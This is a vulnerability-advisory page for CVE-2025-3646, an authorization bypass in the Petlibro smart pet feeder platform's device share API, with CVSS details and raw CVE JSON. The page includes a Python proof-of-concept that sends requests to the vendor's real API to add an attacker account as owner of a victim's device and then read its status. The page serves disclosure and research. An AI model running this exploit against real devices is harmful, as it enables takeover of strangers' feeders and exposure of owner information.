Security Vulnerability Report
CVE-2025-3646 CVSS 7.3 HIGH

CVE-2025-3646

Published: 2026-01-04 00:15:44
Last Modified: 2026-02-03 17:42:16

Description

Petlibro Smart Pet Feeder Platform versions up to and including 1.7.31 contain an authorization bypass vulnerability that allows unauthorized users to add users as shared owners to any device by exploiting missing permission checks. Attackers can send requests to the device share API to gain unauthorized access to devices and view owner information without proper authorization validation.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
(This is the Secondary CVSS 3.1 score; the Primary CVSS 3.1 assessment in the raw JSON below rates the same issue 8.2 HIGH with vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N, and the CVSS 4.0 base score there is 6.9 MEDIUM.)

Configurations (Affected Products)

cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:* - VULNERABLE
Petlibro Smart Pet Feeder Platform <= 1.7.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-3646 PoC - Petlibro Smart Pet Feeder Authorization Bypass # Target: Petlibro Smart Pet Feeder Platform <= 1.7.31 # Vulnerability: Missing authorization check in device share API TARGET_DEVICE_ID = "TARGET_DEVICE_ID_HERE" # Target device ID ATTACKER_USER_ID = "[email protected]" # Attacker's account API_BASE_URL = "https://api.petlibro.com" # API endpoint def exploit_device_share(): """ Exploit the authorization bypass vulnerability to add attacker as device owner """ # Step 1: Prepare the malicious share request share_payload = { "device_id": TARGET_DEVICE_ID, "share_to": ATTACKER_USER_ID, "permission": "owner" } # Step 2: Send the unauthorized share request # The API does not verify if the requester has permission to share the device headers = { "Content-Type": "application/json", "User-Agent": "PetlibroApp/1.7.31" } try: response = requests.post( f"{API_BASE_URL}/api/device/share", json=share_payload, headers=headers, timeout=10 ) print(f"[*] Request sent to device share API") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: result = response.json() if result.get("success"): print("[+] SUCCESS: Attacker added as device owner!") print(f"[+] Gained unauthorized access to device: {TARGET_DEVICE_ID}") return True print("[-] Exploitation failed") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def verify_access(): """ Verify the attacker now has access to the victim's device """ headers = { "User-Agent": "PetlibroApp/1.7.31", "X-User-Email": ATTACKER_USER_ID } try: response = requests.get( f"{API_BASE_URL}/api/device/{TARGET_DEVICE_ID}/status", headers=headers, timeout=10 ) if response.status_code == 200: print("[+] VERIFIED: Attacker can now view device information") print(f"[+] Device data: {response.text}") return True return False except requests.exceptions.RequestException as e: print(f"[-] 
Verification failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-3646 PoC - Petlibro Device Share Authorization Bypass") print("=" * 60) if exploit_device_share(): verify_access() print("=" * 60)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-3646", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.783", "lastModified": "2026-02-03T17:42:15.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authorization bypass vulnerability that allows unauthorized users to add users as shared owners to any device by exploiting missing permission checks. Attackers can send requests to the device share API to gain unauthorized access to devices and view owner information without proper authorization validation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-authorization-bypass-via-device-share-api", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}